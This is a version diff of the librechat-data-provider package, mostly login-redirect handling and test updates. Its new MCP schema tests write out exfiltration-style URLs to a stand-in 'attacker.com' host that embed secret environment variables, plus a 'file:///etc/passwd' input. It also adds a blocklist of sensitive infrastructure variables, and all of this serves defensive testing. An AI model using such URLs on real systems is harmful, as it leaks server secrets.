librechat-data-provider 0.8.301 → 0.8.400

package/jest.config.js

@@ -14,5 +14,6 @@ module.exports = {
   //     lines: 57,
   //   },
   // },
+  maxWorkers: '50%',
   restoreMocks: true,
 };

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "librechat-data-provider",
-  "version": "0.8.301",
+  "version": "0.8.400",
   "description": "data services for librechat apps",
   "main": "dist/index.js",
   "module": "dist/index.es.js",

package/specs/api-endpoints-subdir.spec.ts

@@ -0,0 +1,140 @@
+/**
+ * @jest-environment jsdom
+ */
+
+/**
+ * Tests for buildLoginRedirectUrl and apiBaseUrl under subdirectory deployments.
+ *
+ * Uses jest.isolateModules to re-import api-endpoints with a <base href="/chat/">
+ * element present, simulating a subdirectory deployment where BASE_URL = '/chat'.
+ *
+ * Tests that need to override window.location use explicit function arguments
+ * instead of mocking the global, since jsdom 26+ does not allow redefining it.
+ */
+
+function loadModuleWithBase(baseHref: string) {
+  const base = document.createElement('base');
+  base.setAttribute('href', baseHref);
+  document.head.appendChild(base);
+
+  const proc = process as typeof process & { browser?: boolean };
+  const originalBrowser = proc.browser;
+
+  let mod: typeof import('../src/api-endpoints');
+  try {
+    proc.browser = true;
+    jest.isolateModules(() => {
+      // eslint-disable-next-line @typescript-eslint/no-require-imports -- static import not usable inside isolateModules
+      mod = require('../src/api-endpoints');
+    });
+    return mod!;
+  } finally {
+    proc.browser = originalBrowser;
+    document.head.removeChild(base);
+  }
+}
+
+describe('buildLoginRedirectUrl — subdirectory deployment (BASE_URL = /chat)', () => {
+  let buildLoginRedirectUrl: typeof import('../src/api-endpoints').buildLoginRedirectUrl;
+  let apiBaseUrl: typeof import('../src/api-endpoints').apiBaseUrl;
+
+  beforeAll(() => {
+    const mod = loadModuleWithBase('/chat/');
+    buildLoginRedirectUrl = mod.buildLoginRedirectUrl;
+    apiBaseUrl = mod.apiBaseUrl;
+  });
+
+  it('sets BASE_URL to "/chat" (trailing slash stripped)', () => {
+    expect(apiBaseUrl()).toBe('/chat');
+  });
+
+  it('returns "/login" without base prefix (compatible with React Router navigate)', () => {
+    const result = buildLoginRedirectUrl('/chat/c/new', '', '');
+    expect(result).toMatch(/^\/login/);
+    expect(result).not.toMatch(/^\/chat/);
+  });
+
+  it('strips base prefix from redirect_to when pathname includes base', () => {
+    const result = buildLoginRedirectUrl('/chat/c/abc123', '?model=gpt-4', '');
+    const redirectTo = decodeURIComponent(result.split('redirect_to=')[1]);
+    expect(redirectTo).toBe('/c/abc123?model=gpt-4');
+    expect(redirectTo).not.toContain('/chat/');
+  });
+
+  it('works with pathnames that do not include the base prefix', () => {
+    const result = buildLoginRedirectUrl('/c/new', '', '');
+    const redirectTo = decodeURIComponent(result.split('redirect_to=')[1]);
+    expect(redirectTo).toBe('/c/new');
+  });
+
+  it('returns plain /login for base-prefixed login path', () => {
+    expect(buildLoginRedirectUrl('/chat/login', '', '')).toBe('/login');
+  });
+
+  it('returns plain /login for base-prefixed login sub-path', () => {
+    expect(buildLoginRedirectUrl('/chat/login/2fa', '', '')).toBe('/login');
+  });
+
+  it('returns plain /login when stripped path is root (no pointless redirect_to=/)', () => {
+    const result = buildLoginRedirectUrl('/chat', '', '');
+    expect(result).toBe('/login');
+    expect(result).not.toContain('redirect_to');
+  });
+
+  it('composes correct full URL for window.location.href (apiBaseUrl + buildLoginRedirectUrl)', () => {
+    const fullUrl = apiBaseUrl() + buildLoginRedirectUrl('/chat/c/abc123', '', '');
+    expect(fullUrl).toBe('/chat/login?redirect_to=%2Fc%2Fabc123');
+    expect(fullUrl).not.toContain('/chat/chat/');
+  });
+
+  it('encodes query params and hash correctly after stripping base', () => {
+    const result = buildLoginRedirectUrl('/chat/c/deep', '?q=hello&submit=true', '#section');
+    const redirectTo = decodeURIComponent(result.split('redirect_to=')[1]);
+    expect(redirectTo).toBe('/c/deep?q=hello&submit=true#section');
+  });
+
+  it('does not strip base when path shares a prefix but is not a segment match', () => {
+    const result = buildLoginRedirectUrl('/chatroom/c/abc123', '', '');
+    const redirectTo = decodeURIComponent(result.split('redirect_to=')[1]);
+    expect(redirectTo).toBe('/chatroom/c/abc123');
+  });
+
+  it('does not strip base from /chatbot path', () => {
+    const result = buildLoginRedirectUrl('/chatbot', '', '');
+    const redirectTo = decodeURIComponent(result.split('redirect_to=')[1]);
+    expect(redirectTo).toBe('/chatbot');
+  });
+});
+
+describe('buildLoginRedirectUrl — deep subdirectory (BASE_URL = /app/chat)', () => {
+  let buildLoginRedirectUrl: typeof import('../src/api-endpoints').buildLoginRedirectUrl;
+  let apiBaseUrl: typeof import('../src/api-endpoints').apiBaseUrl;
+
+  beforeAll(() => {
+    const mod = loadModuleWithBase('/app/chat/');
+    buildLoginRedirectUrl = mod.buildLoginRedirectUrl;
+    apiBaseUrl = mod.apiBaseUrl;
+  });
+
+  it('sets BASE_URL to "/app/chat"', () => {
+    expect(apiBaseUrl()).toBe('/app/chat');
+  });
+
+  it('strips deep base prefix from redirect_to', () => {
+    const result = buildLoginRedirectUrl('/app/chat/c/abc123', '', '');
+    const redirectTo = decodeURIComponent(result.split('redirect_to=')[1]);
+    expect(redirectTo).toBe('/c/abc123');
+  });
+
+  it('full URL does not double the base prefix', () => {
+    const fullUrl = apiBaseUrl() + buildLoginRedirectUrl('/app/chat/c/abc123', '', '');
+    expect(fullUrl).toBe('/app/chat/login?redirect_to=%2Fc%2Fabc123');
+    expect(fullUrl).not.toContain('/app/chat/app/chat/');
+  });
+
+  it('does not strip from /app/chatroom (segment boundary check)', () => {
+    const result = buildLoginRedirectUrl('/app/chatroom/page', '', '');
+    const redirectTo = decodeURIComponent(result.split('redirect_to=')[1]);
+    expect(redirectTo).toBe('/app/chatroom/page');
+  });
+});

package/specs/api-endpoints.spec.ts

@@ -4,18 +4,8 @@
 import { buildLoginRedirectUrl } from '../src/api-endpoints';
 
 describe('buildLoginRedirectUrl', () => {
-  let savedLocation: Location;
-
-  beforeEach(() => {
-    savedLocation = window.location;
-    Object.defineProperty(window, 'location', {
-      value: { pathname: '/c/abc123', search: '?model=gpt-4', hash: '#msg-5' },
-      writable: true,
-    });
-  });
-
   afterEach(() => {
-    Object.defineProperty(window, 'location', { value: savedLocation, writable: true });
+    window.history.replaceState({}, '', '/');
   });
 
   it('builds a login URL from explicit args', () => {
@@ -31,18 +21,16 @@ describe('buildLoginRedirectUrl', () => {
   });
 
   it('falls back to window.location when no args provided', () => {
+    window.history.replaceState({}, '', '/c/abc123?model=gpt-4#msg-5');
     const result = buildLoginRedirectUrl();
     const encoded = result.split('redirect_to=')[1];
     expect(decodeURIComponent(encoded)).toBe('/c/abc123?model=gpt-4#msg-5');
   });
 
-  it('falls back to "/" when all location parts are empty', () => {
-    Object.defineProperty(window, 'location', {
-      value: { pathname: '', search: '', hash: '' },
-      writable: true,
-    });
+  it('returns plain /login when all location parts are empty (root)', () => {
+    window.history.replaceState({}, '', '/');
     const result = buildLoginRedirectUrl();
-    expect(result).toBe('/login?redirect_to=%2F');
+    expect(result).toBe('/login');
   });
 
   it('returns plain /login when pathname is /login (prevents recursive redirect)', () => {
@@ -51,10 +39,7 @@ describe('buildLoginRedirectUrl', () => {
   });
 
   it('returns plain /login when window.location is already /login', () => {
-    Object.defineProperty(window, 'location', {
-      value: { pathname: '/login', search: '?redirect_to=%2Fc%2Fabc', hash: '' },
-      writable: true,
-    });
+    window.history.replaceState({}, '', '/login?redirect_to=%2Fc%2Fabc');
     const result = buildLoginRedirectUrl();
     expect(result).toBe('/login');
   });
@@ -65,10 +50,7 @@ describe('buildLoginRedirectUrl', () => {
   });
 
   it('returns plain /login for basename-prefixed /login (e.g. /librechat/login)', () => {
-    Object.defineProperty(window, 'location', {
-      value: { pathname: '/librechat/login', search: '?redirect_to=%2Fc%2Fabc', hash: '' },
-      writable: true,
-    });
+    window.history.replaceState({}, '', '/librechat/login?redirect_to=%2Fc%2Fabc');
     const result = buildLoginRedirectUrl();
     expect(result).toBe('/login');
   });
@@ -78,6 +60,12 @@ describe('buildLoginRedirectUrl', () => {
     expect(result).toBe('/login');
   });
 
+  it('returns plain /login for root path (no pointless redirect_to=/)', () => {
+    const result = buildLoginRedirectUrl('/', '', '');
+    expect(result).toBe('/login');
+    expect(result).not.toContain('redirect_to');
+  });
+
   it('does NOT match paths where "login" is a substring of a segment', () => {
     const result = buildLoginRedirectUrl('/c/loginhistory', '', '');
     expect(result).toContain('redirect_to=');

package/specs/mcp.spec.ts

@@ -0,0 +1,147 @@
+import { SSEOptionsSchema, MCPServerUserInputSchema } from '../src/mcp';
+
+describe('MCPServerUserInputSchema', () => {
+  describe('env variable exfiltration prevention', () => {
+    it('should confirm admin schema resolves env vars (attack vector baseline)', () => {
+      process.env.FAKE_SECRET = 'leaked-secret-value';
+      const adminResult = SSEOptionsSchema.safeParse({
+        type: 'sse',
+        url: 'http://attacker.com/?secret=${FAKE_SECRET}',
+      });
+      expect(adminResult.success).toBe(true);
+      if (adminResult.success) {
+        expect(adminResult.data.url).toContain('leaked-secret-value');
+      }
+      delete process.env.FAKE_SECRET;
+    });
+
+    it('should reject the same URL through user input schema', () => {
+      process.env.FAKE_SECRET = 'leaked-secret-value';
+      const userResult = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'http://attacker.com/?secret=${FAKE_SECRET}',
+      });
+      expect(userResult.success).toBe(false);
+      delete process.env.FAKE_SECRET;
+    });
+  });
+
+  describe('env variable rejection', () => {
+    it('should reject SSE URLs containing env variable patterns', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'http://attacker.com/?secret=${FAKE_SECRET}',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject streamable-http URLs containing env variable patterns', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'streamable-http',
+        url: 'http://attacker.com/?jwt=${JWT_SECRET}',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject WebSocket URLs containing env variable patterns', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'websocket',
+        url: 'ws://attacker.com/?secret=${FAKE_SECRET}',
+      });
+      expect(result.success).toBe(false);
+    });
+  });
+
+  describe('protocol allowlisting', () => {
+    it('should reject file:// URLs for SSE', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'file:///etc/passwd',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject ftp:// URLs for streamable-http', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'streamable-http',
+        url: 'ftp://internal-server/data',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject http:// URLs for WebSocket', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'websocket',
+        url: 'http://example.com/ws',
+      });
+      expect(result.success).toBe(false);
+    });
+
+    it('should reject ws:// URLs for SSE', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'ws://example.com/sse',
+      });
+      expect(result.success).toBe(false);
+    });
+  });
+
+  describe('valid URL acceptance', () => {
+    it('should accept valid https:// SSE URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'https://mcp-server.com/sse',
+      });
+      expect(result.success).toBe(true);
+      if (result.success) {
+        expect(result.data.url).toBe('https://mcp-server.com/sse');
+      }
+    });
+
+    it('should accept valid http:// SSE URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'sse',
+        url: 'http://mcp-server.com/sse',
+      });
+      expect(result.success).toBe(true);
+    });
+
+    it('should accept valid wss:// WebSocket URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'websocket',
+        url: 'wss://mcp-server.com/ws',
+      });
+      expect(result.success).toBe(true);
+      if (result.success) {
+        expect(result.data.url).toBe('wss://mcp-server.com/ws');
+      }
+    });
+
+    it('should accept valid ws:// WebSocket URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'websocket',
+        url: 'ws://mcp-server.com/ws',
+      });
+      expect(result.success).toBe(true);
+    });
+
+    it('should accept valid https:// streamable-http URLs', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'streamable-http',
+        url: 'https://mcp-server.com/http',
+      });
+      expect(result.success).toBe(true);
+      if (result.success) {
+        expect(result.data.url).toBe('https://mcp-server.com/http');
+      }
+    });
+
+    it('should accept valid http:// streamable-http URLs with "http" alias', () => {
+      const result = MCPServerUserInputSchema.safeParse({
+        type: 'http',
+        url: 'http://mcp-server.com/mcp',
+      });
+      expect(result.success).toBe(true);
+    });
+  });
+});

package/specs/request-interceptor.spec.ts

@@ -1,16 +1,19 @@
 /**
- * @jest-environment jsdom
+ * @jest-environment @happy-dom/jest-environment
  */
 import axios from 'axios';
 import { setTokenHeader } from '../src/headers-helpers';
 
 /**
  * The response interceptor in request.ts registers at import time when
- * `typeof window !== 'undefined'` (jsdom provides window).
+ * `typeof window !== 'undefined'` (happy-dom provides window).
  *
  * We use axios's built-in request adapter mock to avoid real HTTP calls,
  * and verify the interceptor's behavior by observing whether a 401 triggers
  * a refresh POST or is immediately rejected.
+ *
+ * happy-dom is used instead of jsdom because it allows overriding
+ * window.location via Object.defineProperty, which jsdom 26+ blocks.
  */
 
 const mockAdapter = jest.fn();
@@ -38,6 +41,7 @@ afterEach(() => {
   Object.defineProperty(window, 'location', {
     value: savedLocation,
     writable: true,
+    configurable: true,
   });
 });
 
@@ -45,6 +49,7 @@ function setWindowLocation(overrides: Partial<Location>) {
   Object.defineProperty(window, 'location', {
     value: { ...window.location, ...overrides },
     writable: true,
+    configurable: true,
   });
 }
 

package/specs/utils.spec.ts

@@ -1,4 +1,4 @@
-import { extractEnvVariable } from '../src/utils';
+import { extractEnvVariable, isSensitiveEnvVar } from '../src/utils';
 
 describe('Environment Variable Extraction', () => {
   const originalEnv = process.env;
@@ -7,7 +7,7 @@ describe('Environment Variable Extraction', () => {
     process.env = {
       ...originalEnv,
       TEST_API_KEY: 'test-api-key-value',
-      ANOTHER_SECRET: 'another-secret-value',
+      ANOTHER_VALUE: 'another-value',
     };
   });
 
@@ -55,7 +55,7 @@ describe('Environment Variable Extraction', () => {
   describe('extractEnvVariable function', () => {
     it('should extract environment variables from exact matches', () => {
       expect(extractEnvVariable('${TEST_API_KEY}')).toBe('test-api-key-value');
-      expect(extractEnvVariable('${ANOTHER_SECRET}')).toBe('another-secret-value');
+      expect(extractEnvVariable('${ANOTHER_VALUE}')).toBe('another-value');
     });
 
     it('should extract environment variables from strings with prefixes', () => {
@@ -82,7 +82,7 @@ describe('Environment Variable Extraction', () => {
   describe('extractEnvVariable', () => {
     it('should extract environment variable values', () => {
       expect(extractEnvVariable('${TEST_API_KEY}')).toBe('test-api-key-value');
-      expect(extractEnvVariable('${ANOTHER_SECRET}')).toBe('another-secret-value');
+      expect(extractEnvVariable('${ANOTHER_VALUE}')).toBe('another-value');
     });
 
     it('should return the original string if environment variable is not found', () => {
@@ -126,4 +126,71 @@ describe('Environment Variable Extraction', () => {
       );
     });
   });
+
+  describe('isSensitiveEnvVar', () => {
+    it('should flag infrastructure secrets', () => {
+      expect(isSensitiveEnvVar('JWT_SECRET')).toBe(true);
+      expect(isSensitiveEnvVar('JWT_REFRESH_SECRET')).toBe(true);
+      expect(isSensitiveEnvVar('CREDS_KEY')).toBe(true);
+      expect(isSensitiveEnvVar('CREDS_IV')).toBe(true);
+      expect(isSensitiveEnvVar('MEILI_MASTER_KEY')).toBe(true);
+      expect(isSensitiveEnvVar('MONGO_URI')).toBe(true);
+      expect(isSensitiveEnvVar('REDIS_URI')).toBe(true);
+      expect(isSensitiveEnvVar('REDIS_PASSWORD')).toBe(true);
+    });
+
+    it('should allow non-infrastructure vars through (including operator-configured secrets)', () => {
+      expect(isSensitiveEnvVar('OPENAI_API_KEY')).toBe(false);
+      expect(isSensitiveEnvVar('ANTHROPIC_API_KEY')).toBe(false);
+      expect(isSensitiveEnvVar('GOOGLE_KEY')).toBe(false);
+      expect(isSensitiveEnvVar('PROXY')).toBe(false);
+      expect(isSensitiveEnvVar('DEBUG_LOGGING')).toBe(false);
+      expect(isSensitiveEnvVar('DOMAIN_CLIENT')).toBe(false);
+      expect(isSensitiveEnvVar('APP_TITLE')).toBe(false);
+      expect(isSensitiveEnvVar('OPENID_CLIENT_SECRET')).toBe(false);
+      expect(isSensitiveEnvVar('DISCORD_CLIENT_SECRET')).toBe(false);
+      expect(isSensitiveEnvVar('MY_CUSTOM_SECRET')).toBe(false);
+    });
+  });
+
+  describe('extractEnvVariable sensitive var blocklist', () => {
+    beforeEach(() => {
+      process.env.JWT_SECRET = 'super-secret-jwt';
+      process.env.JWT_REFRESH_SECRET = 'super-secret-refresh';
+      process.env.CREDS_KEY = 'encryption-key';
+      process.env.CREDS_IV = 'encryption-iv';
+      process.env.MEILI_MASTER_KEY = 'meili-key';
+      process.env.MONGO_URI = 'mongodb://user:pass@host/db';
+      process.env.REDIS_URI = 'redis://:pass@host:6379';
+      process.env.REDIS_PASSWORD = 'redis-pass';
+      process.env.OPENAI_API_KEY = 'sk-legit-key';
+    });
+
+    it('should refuse to resolve sensitive vars (single-match path)', () => {
+      expect(extractEnvVariable('${JWT_SECRET}')).toBe('${JWT_SECRET}');
+      expect(extractEnvVariable('${JWT_REFRESH_SECRET}')).toBe('${JWT_REFRESH_SECRET}');
+      expect(extractEnvVariable('${CREDS_KEY}')).toBe('${CREDS_KEY}');
+      expect(extractEnvVariable('${CREDS_IV}')).toBe('${CREDS_IV}');
+      expect(extractEnvVariable('${MEILI_MASTER_KEY}')).toBe('${MEILI_MASTER_KEY}');
+      expect(extractEnvVariable('${MONGO_URI}')).toBe('${MONGO_URI}');
+      expect(extractEnvVariable('${REDIS_URI}')).toBe('${REDIS_URI}');
+      expect(extractEnvVariable('${REDIS_PASSWORD}')).toBe('${REDIS_PASSWORD}');
+    });
+
+    it('should refuse to resolve sensitive vars in composite strings (multi-match path)', () => {
+      expect(extractEnvVariable('key=${JWT_SECRET}&more')).toBe('key=${JWT_SECRET}&more');
+      expect(extractEnvVariable('db=${MONGO_URI}/extra')).toBe('db=${MONGO_URI}/extra');
+    });
+
+    it('should still resolve non-sensitive vars normally', () => {
+      expect(extractEnvVariable('${OPENAI_API_KEY}')).toBe('sk-legit-key');
+      expect(extractEnvVariable('Bearer ${OPENAI_API_KEY}')).toBe('Bearer sk-legit-key');
+    });
+
+    it('should resolve non-sensitive vars while blocking sensitive ones in the same string', () => {
+      expect(extractEnvVariable('key=${OPENAI_API_KEY}&secret=${JWT_SECRET}')).toBe(
+        'key=sk-legit-key&secret=${JWT_SECRET}',
+      );
+    });
+  });
 });

package/src/accessPermissions.ts

@@ -200,9 +200,9 @@ export type TUpdateResourcePermissionsResponse = z.infer<
  * Principal search request parameters
  */
 export type TPrincipalSearchParams = {
-  q: string; // search query (required)
-  limit?: number; // max results (1-50, default 10)
-  type?: PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE; // filter by type (optional)
+  q: string;
+  limit?: number;
+  types?: Array<PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE>;
 };
 
 /**
@@ -228,7 +228,7 @@ export type TPrincipalSearchResult = {
 export type TPrincipalSearchResponse = {
   query: string;
   limit: number;
-  type?: PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE;
+  types?: Array<PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE> | null;
   results: TPrincipalSearchResult[];
   count: number;
   sources: {

package/src/api-endpoints.ts

@@ -174,13 +174,20 @@ const LOGIN_PATH_RE = /(?:^|\/)login(?:\/|$)/;
 export function buildLoginRedirectUrl(pathname?: string, search?: string, hash?: string): string {
   const p = pathname ?? window.location.pathname;
   if (LOGIN_PATH_RE.test(p)) {
-    return `${BASE_URL}/login`;
+    return '/login';
   }
   const s = search ?? window.location.search;
   const h = hash ?? window.location.hash;
-  const currentPath = `${p}${s}${h}`;
-  const encoded = encodeURIComponent(currentPath || '/');
-  return `${BASE_URL}/login?${REDIRECT_PARAM}=${encoded}`;
+
+  const stripped =
+    BASE_URL && (p === BASE_URL || p.startsWith(BASE_URL + '/'))
+      ? p.slice(BASE_URL.length) || '/'
+      : p;
+  const currentPath = `${stripped}${s}${h}`;
+  if (!currentPath || currentPath === '/') {
+    return '/login';
+  }
+  return `/login?${REDIRECT_PARAM}=${encodeURIComponent(currentPath)}`;
 }
 
 export const resendVerificationEmail = () => `${BASE_URL}/api/user/verify/resend`;